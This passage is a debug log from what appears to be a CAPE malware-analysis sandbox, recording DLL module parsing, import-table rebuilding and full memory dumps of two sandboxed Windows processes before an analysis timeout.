2020-03-24 10:13:54,549 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:54,549 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:54,549 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,565 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:54,565 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:54,565 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,581 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,596 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,596 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,596 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,611 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,611 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,628 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,628 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,628 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,658 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,658 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,674 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,674 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,674 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,690 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,690 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,690 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,690 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,690 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,706 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,706 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,706 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,706 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,721 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,721 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:13:54,721 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:13:54,736 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:13:54,736 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:13:54,736 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:13:54,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:13:54,753 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:13:54,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:13:54,753 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:13:54,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:13:54,767 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:13:54,767 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:13:54,767 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00400000
2020-03-24 10:13:54,767 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x0046012C
2020-03-24 10:13:54,767 [root] DEBUG: Module image dump success
2020-03-24 10:13:54,783 [root] DEBUG: DumpProcessFixImports: Found IAT - 0x4de128, size: 0x694
2020-03-24 10:13:54,783 [root] DEBUG: IAT parsing finished, found 407 valid APIs, missed 0 APIs
2020-03-24 10:13:54,783 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: oleaut32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:54,815 [root] DEBUG: Adding module to module list: version.dll
2020-03-24 10:13:54,815 [root] DEBUG: Adding module to module list: gdi32.dll
2020-03-24 10:13:54,815 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:54,815 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:54,815 [root] DEBUG: Adding module to module list: oleaut32.dll
2020-03-24 10:13:54,831 [root] DEBUG: Adding module to module list: comctl32.dll
2020-03-24 10:13:54,831 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:54,831 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:54,831 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:54,831 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:54,861 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1964_139413844654132024232020
2020-03-24 10:13:54,892 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x035A0000.
2020-03-24 10:13:54,892 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 10:13:54,892 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x035A0000.
2020-03-24 10:13:54,892 [root] DEBUG: DumpProcess: Module entry point VA is 0x000156F4.
2020-03-24 10:13:54,924 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1964_125463227954132024232020
2020-03-24 10:13:54,924 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x82800.
2020-03-24 10:13:55,127 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\1964.dmp.
2020-03-24 10:13:55,127 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:55,142 [root] INFO: Notified of termination of process with pid 1964.
2020-03-24 10:16:31,315 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2020-03-24 10:16:31,315 [root] INFO: Created shutdown mutex.
2020-03-24 10:16:32,328 [lib.api.process] INFO: Terminate event set for process 1540
2020-03-24 10:16:32,328 [root] DEBUG: Terminate Event: Attempting to dump process 1540
2020-03-24 10:16:32,328 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\1540.dmp.
2020-03-24 10:16:32,328 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2020-03-24 10:16:32,344 [root] DEBUG: ApiReader: module list size: 56
2020-03-24 10:16:32,344 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,344 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,359 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:32,359 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:32,359 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,375 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,375 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,375 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,375 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,391 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,391 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,391 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,391 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,407 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,407 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,407 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,407 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,407 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,437 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,437 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,437 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,453 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,453 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,453 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,453 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,469 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,469 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,469 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,469 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,484 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,484 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,484 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,500 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,500 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,500 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,500 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,516 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,516 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,516 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,516 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,530 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,530 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,530 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,530 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,546 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,546 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,546 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,546 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,546 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,562 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,562 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,562 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,562 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,578 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,578 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,578 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,578 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,578 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,594 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,594 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,594 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,594 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,594 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,625 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:32,625 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:32,625 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,625 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,641 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,641 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,641 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,641 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,655 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,655 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,655 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,655 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,671 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,671 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,671 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,671 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,687 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,687 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,687 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,703 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,703 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,703 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,703 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,719 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,719 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,719 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,750 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,750 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,750 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,750 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,765 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,765 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,765 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,765 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,780 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,780 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,780 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,796 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,796 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,796 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,796 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,812 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,812 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,812 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,812 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,828 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,828 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,828 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,828 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,828 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
